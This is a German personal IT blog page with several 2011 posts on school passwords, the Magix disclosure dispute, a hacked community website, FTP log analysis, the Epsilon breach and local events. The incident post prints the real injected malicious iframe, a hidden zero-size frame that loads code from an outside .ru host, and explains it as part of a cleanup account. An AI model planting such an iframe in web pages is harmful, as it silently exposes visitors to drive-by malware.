Glorf IT

Meine Tochter erzählte mir, dass in der Schule neue Passwörter eingeführt werden. Jeder Schüler bekam einen kryptischen Benutzernamen z.B. "Emmy01254" und als Passwort wurde der Geburtstag vergeben. Die Schüler dürfen das Passwort aber nicht ändern. Meine Tochter kennt von einigen Schülern schon den Benutzernamen, einfach weil der Lehrer die Liste gar nicht geheim hielt. Daher ist sie sicher, dass einige nun auch schon ihren Benutzernamen kennen. Der Geburtstag der Mitschüler ist nun wirklich kein Geheimnis. Meine Tochter hatte bspw. neulich erst Geburtstag. Da wurde von allen gratuliert und ein Ständchen gesungen.

Anhand des Passwortes werden Erlanger bereits erkannt haben, auf welche Schule meine Tochter geht, nämlich aufs "Emmy". Der Benutzername wäre an sich schon OK, wenn er wegen der seltsamen Passwort-Politik nicht gerade der eigentlich geheime Teil wäre. Ich habe keine Ahnung, was man im Schulnetz so anfangen kann, wenn man sich als jemand anderer anmeldet, aber bin mir sicher, dass man jemandem schon das Leben schwer machen kann, wenn man sich mit dessen Benutzer anmeldet und mal richtig bösartig Blödsinn anstellt. 🙁

Ich konnte das gar nicht glauben, was meine Tochter erzählte und fragte mehrfach nach. Der Lehrer habe merhfach betont, dass sie das Passwort nicht ändern sollen! Da werde ich demnächst mal in der Schule nachfragen, ob ich Hintergrundinfos erfahre. Das wäre doch wirklich sehr seltsam und entgegen aller guten Sitten.

Update 5.5.2011: Entwarnung: Das war ein Missverständnis. Ich muss noch klären auf welcher Seite: Meine Töchter beharren darauf, dass die Info "nicht ändern" hieß. Der Informatik-Betreuer der Schule stellte aber per Mail klar:

Genau das Gegenteil ist richtig: der (vielen bekannte) Geburtstag als Kennwort soll SOFORT geändert werden in ein eigenes Kennwort!

Das ist die von mir erhoffte Antwort. Meine Welt ist wieder in Ordnung.

Das haben die Kollegen bei Magix wohl nicht so richtig verstanden. Anstelle dankbar zu sein, dass sich ein Security-Freak an sie wandte und ihnen eine Sicherheitslücke offenbarte, wird der arme Kerl nun unter Druck gesetzt. Natürlich findet es keine Firma gut, wenn eine eigene Sicherheitslücke veröffentlicht wird. Aber anstelle den Dialog zwischen Fachleuten zu suchen und ggf. um Aufschub zu bitten, wird ein Anwalt eingeschaltet. Hallo?
Ich bin sicher, dass andere sich es nun gut überlegen, ob sie gefundene Lücken in Magix-Software zukünftig an Magix melden oder die Kommunikation den großen Firmen überlassen. Dazu verkauft man die Sicherheitslücke an eine der bekannten Firmen und bekommt tatsächlich Geld dafür. Schade, dass ich keine Magix-Software habe, ich würde mir gerne mal einen Eindruck von deren Software verschaffen und ein paar Standard-Dinge checken.

Für Magix ist das jetzt jedenfalls ein PR-Gau geworden: Nun weiß man in einschlägigen Kreisen genau, dass deren Software nicht nur schwerwiegende Lücken enthält, sondern auch, dass die Firma gemeldete Lücken nicht kurzfristig behebt und sich alles andere als kooperativ zeigt. Mehr dazu im Heise-Artikel "Magix verhindert Exploit-Veröffentlichung".

Das erinnert an den Fall von Sony, die gegen George "GeoHot" Hotz wegen des Jailbreak der Playstation gerichtlich vorgingen. Das macht auf mich einen hilflosen und planlosen Eindruck. Gerichte und Anwälte sind in der Regel das letzte Mittel. Ganz anders ging hier übrigens Microsoft vor, die den gleichen Fall nutzten, um für denen Phone OS zu werben. Sie luden die Hacker ein und fachsimpelten mit denen, wie man deren Ziele und die von Microsoft in Einklang bringen könne. Respekt! Damit hat Microsoft in meinen Augen echt Boden gut gemacht. Erst dadurch kommt für mich ein Handy mit Windows überhaupt erst ansatzweise in Frage.

In unserer Gemeinde betreiben einige Engagierte die sehr erfolgreiche Web-Seite Fairlangen.org. Dabei geht es darum sich darüber auszutauschen, wo man in Erlangen fair gehandelte Waren kaufen kann. Über Wege, die mir noch nicht klar sind, hat ein Bösewicht Zugang zu dem FTP-Passwort der Seite bekommen und ein paar der dort vorhandenen Index-Seiten (index.htm, index.html und index.php) mit einem bösartigen Code-Snippet verseucht. Wirksam war dabei aber lediglich die Seite "index.php". Einem Menschen wäre sicher sofort aufgefallen, dass die index.htm und index.html nur über einen direkten Link aufgerufen werden konnten und eigentlich sinnlos waren (jetzt sind sie Geschichte). Daher vermute ich, dass das alles automatisiert erfolgte.

Einen der Log-Einträge habe ich bereits vorher erklärt (ist nur an zwei Stellen anonymisiert):

Tue Apr 19 14:02:55 2011 0 ::ffff:174.37.220.147 65 /www/htdocs/xxxxxxxx/index.htm b _ o r yyyyyyyy ftp 0 * c
Tue Apr 19 14:02:55 2011 0 ::ffff:174.37.220.147 198 /www/htdocs/xxxxxxxx/index.htm b _ i r yyyyyyyy ftp 0 * c

Daran sieht man, dass nicht unser Webserver kompromittiert und dann der Schadcode via CMS eingeschleust wurde, sondern der FTP-Zugriff von einem anderen System (174.37.220.147 sind wir nicht) erfolgte. HIer sieh man, wie eine der verseuchten Dateien gespeichert, manipuliert und noch in der gleichen Sekunde wieder hoch geladen wurde. Danach war sie um ein iframe reicher (Bitte nicht der URL folgen, ist absichtlich kein Link!):

<iframe src="http://quake2012.ru/in.php?a=QQkFBwQHBAEABQQMEkcJBQcEBwAEAwUBAw==" width="0" height="0" frameborder="0"></iframe>

Aus naheliegenden Gründen habe ich nicht ausprobiert, was dieser fremde Link für Code nachlud. Ich hoffe, dass er nicht viel Schaden anrichtete. Unsere Seite würde nämlich sehr schnell von einschlägigen Seiten als bösartig eingestuft. Daher warnten Firefox, Safari und Google vor dem Besuch unserer Seite.

Nach der Änderung aller Passwörter (und dem Eintragen der DB-Passwörter in tausend INIs) und der Bereinigung der Seite, fing die eigentlich Arbeit an. Weil mir unklar war, wie der Gauner an das FTP-Passwort kam (der eigentliche Betreuer der Webseite ist in Urlaub), konnte ich nur vermuten. Es sieht nicht danach aus, als wäre die Seite kompromittiert worden, sondern eher der Rechner eines der FTP-Nutzer dieser Seite. Trotzdem habe ich sämtliche Software darauf aktualisiert, das war ohnehin fällig.

Aus der Erfahrung meine Tipps in der Situation:

• cool bleiben und nichts einfach löschen
• Die Domäne einfach mal in ein leeres Unterverzeichnis umleiten oder wenigstens die Index-Seiten als erstes einfach mal umbenennen, um die Leser mit älteren Browsern, die nicht warnen, zu schützen.
• Das FTP-Passwort ändern.
• Wenn genug Bandbreite da ist (sehr zu empfehlen): Den aktuellen, verseuchten Stand lokal sichern, sonst nur die infizierten Dateien separat speichern.
• Mittels einen DIFF-Tool, wie bspw. BeyondCompare (billig und gut) den aktuellen Stand auf dem Webserver mit der letzten lokalen Sicherung vergleichen und die betroffenen Dateien ermitteln.
• Die Log-Dateien sichten, bei uns wurde ich schnell im FTP-Log fündig.
• Mit der letzten Sicherung zurück setzen.
• Alle Passwörter ändern, die in irgendwelchen Dateien stehen, selbst wenn die Dateien nicht per FTP herunter geladen wurden. Ein Bösling könnte sie auch per PHP zippen und dann als Zip runter laden. Ich persönlich wurde das auch tun, wenn ich in den Logs genau sehen kann, dass sonst nicht weiter herunter geladen wurde.
• Domäne wieder auf den nun sauberen Stand umleiten und nötigenfalls Updates aller Software einspielen.
• Google, Firefox, etc davon überzeugen, dass wir wieder zu den Guten gehören.

Das Timing war übrigens perfekt: Der eigentliche Betreuer in Urlaub, mein griffbereites letztes Backup Monate alt, Ostern, schönes Wetter, …

Am Wochenende musste ich kurzfristig die Log-Files eines FTP-Servers unserer Gemeinde analysieren und kam zum Schluss, dass ein Bösewicht wohl an das FTP-Passwort gekommen sein muss. Die lange Fassung folgt noch. HIer mal vorab der Link, wie man die LogFiles verstehen kann: WU-FTPD – Manual: xferlog.5.

Hier ein Beispiel aus dem echten Leben:

Tue Apr 19 14:02:55 2011 0 ::ffff:174.37.220.147 65 /www/htdocs/xxxxxxxx/index.htm b _ o r yyyyyyyy ftp 0 * c
Tue Apr 19 14:02:55 2011 0 ::ffff:174.37.220.147 198 /www/htdocs/xxxxxxxx/index.htm b _ i r yyyyyyyy ftp 0 * c

Das bedeutet:

• Am 19.4.2011 um 14:02 wurde
• die Datei "index.htm" aus dem Rootverzeichnis (Verzeichnis anonymisiert)
• mit der Größe 65 Bytes heruntergeladen
• vom FTP-Benutzer yyyyyyyy von der IP-Adresse 174.37.220.147
• gelesen ("o" für "output").
• Und sofort danach mit der Größe 198 Bytes hoch geladen.

Weitere Infos findet man im WU-FTPD – Manual: xferlog.5.

Gestern hatte ich die Ehre den Alt-Laptop der Gemeinde zu aktualisieren. Weil der Auto-Update von "Avira AntiVir" nicht klappte, lud ich die aktuelle Version von deren Webseite runter. Ich versuchte es wenigstens, denn Avira meldete einen Virus in dem Download von Avira. Das sind schon Scherzkekse.

Falls jemand Zweifel hat: Das war tatsächlich ein Fehlalarm. Aber ein ziemlich lästiger…

Wer sich die neue Schmallspurversion des "Small Business Servers 2011" mal anschauen will, der kann sich bei der TechNet die 180-Tage-Testversion runter laden. Dazu muss man sich mit einer Live-ID registieren. Ein TechNet-Abo ist offenbar nicht erforderlich. Dazu muss man auf dieser Seite auf "Fangen Sie an" klicken.

Dem Vergleich der Features der Editionen kann man entnehmen, dass die Edition Essentials für bis zu 25 Benutzer ausgelegt ist und keine CALs lizenziert werden müssen. Dafür sind weniger Zusatzdienste integriert: kein Exchange, kein SharePoint und kein WSUS (Windows Software Update Services). Diese Ausgabe ist ideal um dort Geschäftsanwendungen zu installieren. Falls die genannten Dienste doch benötigt werden, kann man sie bei Microsoft einzeln als Online beziehen.

Wie seit vorgestern zu lesen ist, möchte die hiesige Universität die Marke "FAU" stärken. Dazu soll das bisherige Logo abgeschafft und ein anderes im Retro-Look der 70er ersetzt werden. Offenbar wurde es rechtzeitig versäumt in den Außenauftritt der einzelnen Fakultäten aufeinander abzustimmen (Quelle):

„Durch eigene Logos von Fakultäten und gänzlich unabhängig voneinander entstandene Gestaltungslinien wurde es immer schwerer, die FAU als ein Ganzes wahrzunehmen“, sagt Prof. Grüske. „Selbst innerhalb einzelner Fakultäten gab und gibt es eine Vielzahl von Erscheinungsbildern, die nichts miteinander zu tun haben. Unser Ziel ist es, mit dem neuen Logo den ersten Schritt zu einem gemeinsamen Erscheinungsbild zu machen, das die Universität in ihrer Gesamtheit transportiert und den Fakultäten trotzdem den Freiraum gibt, als Träger von Wissenschaft, Forschung und Lehre wahrgenommen zu werden.“

Die Idee ist sehr gut, die Umsetzung hingegen finde ich nicht gelungen. Anstelle ein Logo zu entwickeln, dass die bestehende Form aufgreift und modernisiert, wurde ein Retro-Look der 70er gewählt, deren Differenzierung Menschen mit Farbschwäche entgehen dürfte. Zudem haben meine Augen ein Problem damit, weil die weißen Streifen in den Buchstaben zu groß sind. Was sagen denn die Mediziner zu dem Logo?
Tut mir leid, aber für mich wirkt das Streifenlogo insgesamt altbacken: "Gut gemeint" ist nicht "gut gemacht". Ein paar Tage früher und ich hätte es für einen April-Scherz gehalten…

Seltsamerweise scheinen auch die Macher nicht so ganz von Ihrer Idee überzeugt, schreiben Sie doch:

Auch das Siegel bleibt erhalten. „Um die Tradition der FAU als klassische Universität nicht zu vernachlässigen“ erläutert Prof. Grüske, „werden wir das Siegel in unterschiedlichen Zusammenhängen weiter verwenden, etwa als Wasserzeichen auf Briefbögen und Visitenkarten sowie geprägt auf Urkunden.“

Hoppla? Wenn dem so ist, dann sollte die Universität ein Logo wählen, was beiden Ansprüchen gerecht wird…
Es gibt seit heute auch eine Petition für das alte Logo, leider noch ohne Gegenvorschlag, aber wer weiß, vielleicht finden sich ein paar Studenten und machen einen besseren Vorschlag, der auch den Zielen gerecht wird…

Über Spiegel.de erfuhr ich heute über eine Datenpanne, deren Größe und Folgen noch nicht abgeschätzt werden können:

Ein Hacker habe sich Informationen von Kunden der Großbank JPMorgan Chase und der Supermarktkette Kroger verschafft, berichtet der Fachdienst "Security Week". Auch das Techunternehmen TiVo wies seine Kunden auf den Hack hin.
Der Unbekannte sei in das Datensystem des Online-Händlers Epsilon eingedrungen und habe deren Kundenkarteien durchforstet, teilte die Großbank mit. Der Hacker habe sich Zugriff auf E-Mail-Adressen und Hausanschriften verschafft, jedoch nicht auf persönliche oder finanzielle Informationen.

Auf SecurityWeek.com findet man detailliertere Infos: Die Firma Epsilon verwaltet im Auftrag von Unternehmen die Daten von deren Kunden und übernimmt die Kommunikation. Offenbar waren sie dabei nicht besonders sorgfältig. Möglicherweise wurden die gesamten Kunden-Daten ihrer Kunden erbeutet. Hier ein paar Firmen, die Epsilon mit der Kundenverwaltung beauftragten und deren Daten nun vermutlich erbeutet wurden (darunter mehrere Banken und andere Firmen mit großen Kundenzahlen):

• Kroger
• TiVo
• US Bank
• JPMorgan Chase
• Capital One
• Citi
• Home Shopping Network (HSN)
• McKinsey & Company
• Ritz-Carlton Rewards
• Marriott Rewards
• New York & Company
• Brookstone
• Walgreens
• The College Board

Die erspähten Daten reichen in der Regel, um jemandem das Leben zur Hölle zu machen: Anschrift (vermutlich inkl. Telefonnummer) und Mail-Adresse. Wenn es ganz dumm gelaufen ist, dann auch noch weitere Daten, wie Kundennummern bei der jeweiligen Firma. Immerhin werden die betroffenen Kunden diesmal informiert.

Jedenfalls nicht bei Anrufen in denen jemand so die Contenance verliert:

Transskript:

Kies, ich versuche aus NULL die Anwendung IMO… IMO Resolutions zu starten, steht 'Kein Zugriff auf Server glhv3'. Bitte korrigieren Sie das ganz schnell – ich sage es noch mal – ganz schnell. Ich muss hier arbeiten. Ich kann es mir nicht leisten, ständig auf irgendeinen Scheiss zu warten, den die IT nicht auf die Reihe kriegt.

Ich nehme an, dass es wohl eher nicht um die IMO Resolutions der "International Maritime Organization (IMO)" geht… aber was sonst?

Die Schlagzahl bei der SQL-PASS Franken hat sich durch den Attunity-Werbeblock vor zwei Wochen deutlich erhöht. Diesmal kommt aber wieder ein echter HardCore-SQL-Server-Spezialist mit einem sehr ausgefallenen Vortrag ins Rennen: "Desaster-Dokumentation … hilft Hochverfügbarkeit?"
Referent ist der für seinen hintergründigen Humor bekannte Ralf Dietrich. Wer sonst käme auf so einen ausgefallenen Titel, der gleichermaßen verwirrt wie neugierig macht? Bekannt wurde er aber eigentlich durch seine vielfältigen Schulungen und Vorträge auf allen möglichen Kongressen und Tagungen.

Der Termin ist übrigens am Dienstag, den 12.4.2011 um 18:30 Uhr.

Er findet wieder im Vortragssaal der New Elements GmbH (Thurn-und-Taxis-Straße 10, 90411 Nürnberg) statt. Wie immer bitte vorher die Teilnahme bei Michael Deinhard (M.Deinhard(ät)newelements.de) oder Klaus Oberdalhoff (kob(ät)sqlpass.de) ankündigen, damit die Anzahl der benötigten Stühle abgeschätzt werden kann. Kosten: keine. Wer für den Referenten Geld bezahlen möchte, finde hier ein paar gute Gelegenheiten.

Hier die Beschreibung im O-Ton:

"Desaster-Dokumentation … hilft Hochverfügbarkeit?"
Verwaltung/Projekte:
- Dokumentation / Technische Dokumentation / Notfallpläne / Qualitätssicherung
- Notwendiges Übel oder lästige Pflicht oder …
- was braucht man unbedingt,
- was ist trotz hohem Aufwand sehr nützlich
- was kann man gerne weglassen
- Was kann mir helfen, die Arbeit zu automatisieren?

Was macht Ihr? Nicht alles ist für jede Unternehmensgröße wichtig …

ein Diskussionsabend mit Einführung und vielen praktischen Erfahrungen aber bitte ohne Meckern.

Es ist nicht geplant, das Ganze in der Art einer "Schulstunde" (Wenn alles schläft und einer spricht, so nennt man sowas Unterricht) abzuhalten, sondern es ist eher als lockere Diskussionsrunde geplant, bei der jeder seine Erfahrungen mit einbringen sollte.

Info zu Ralf Dietrich

Nach dem Studium arbeitet Ralf Dietrich seit mehr als 12 Jahren als Strategieconsultant, IT-Berater, Datenbankarchitekt und Trainer. In vielfältigen Umgebungen vom Mittelstand bis zum internationalen Konzern lernte er sowohl VLDB-Installationen als auch systemkritische Implementierungen kennen und hilft mit, diese teilweise entscheidend zu verbessern, indem er die Systemarchitekturen, Betriebskonzepte und -abläufe optimiert und gelegentlich unter Berücksichtigung vom speziellen Sicherheits- und Performanceaspekten neu entwirft und implementiert.

Als Geschäftsführer der datafino GmbH kann er darüber hinaus auf ein weiträumig agierendes Team von Spezialisten zurückgreifen.

Als Sprecher war er unter anderem auch auf dem SQL Server Summit in Seattle 2010 und ist jetzt neben der Leitung der RG Sachsen seit der letzten Mitgliederversammlung wieder im deutschen PASS-Vorstand tätig.

Möglicherweise werden wir Ralf in unserem Kreis nicht mehr so oft begrüßen können, daher freue ich mich auf den Abend ganz besonders. Wer sich diese Gelegenheit entgehen lässt, der ist selber schuld…

Wer sich die nächsten Termine frei halten will, findet sie jeweils aktuell bei der SQL-PASS Franken. Hier der heutige Stand: 17.5. / 28.6. / 19.7. / 23.8. (Biergarten) / 20.9. / 18.10. / 15.11.
Die Themen stehen teilweise schon fest und ich kann nur sagen: beachtlich!

Als ich neulich über den etwas schrägen Preisvergleich von Oracle las, musst ich schon schmunzeln: Oracle vergleicht den Preis von MySQL mit dem des Sybase SQL Servers. Offenbar wird seitens Oracle Sybase nun wieder als Konkurrent wahrgenommen seit die zu SAP gehört. Der Vergleich mit Microsoft war ja klar. IBM wird hingegen nicht als Wettbewerber wahrgenommen.

Allerdings sollte man wohl eher MySQL mit dem Sybase SQL Anywhere vergleichen und Oracle mit dem Sybase SQL Server. Die beiden spielen aus meiner Sicht eher jeweils in der gleichen Liga. Auch den Vergleich mit dem Microsoft SQL Server Enterprise Edition finde ich nicht verhältnismäßig. Hier wäre doch wohl eher der Vergleich mit der Express-, der Web- oder maximal der Standard-Edition angesagt, oder?
Wer den Vergleich dennoch machen will, muss sich bei Oracle für den TCO-Calculator registrieren.

Aufmerksam wurde ich darauf durch den Artikel "MySQL Enterprise Edition gegen SQL Server auf silicon.de.

Ja, jetzt weiß ich auch, warum Herr Mappus die Wahl verloren hat: Jägermeister ist mit ihrer subversiven Werbung schuld: Was für eine Flasche!"

Dieser Kommentar zum Landtag hat aber offenbar nicht die Wahlbeteiligung gedrückt.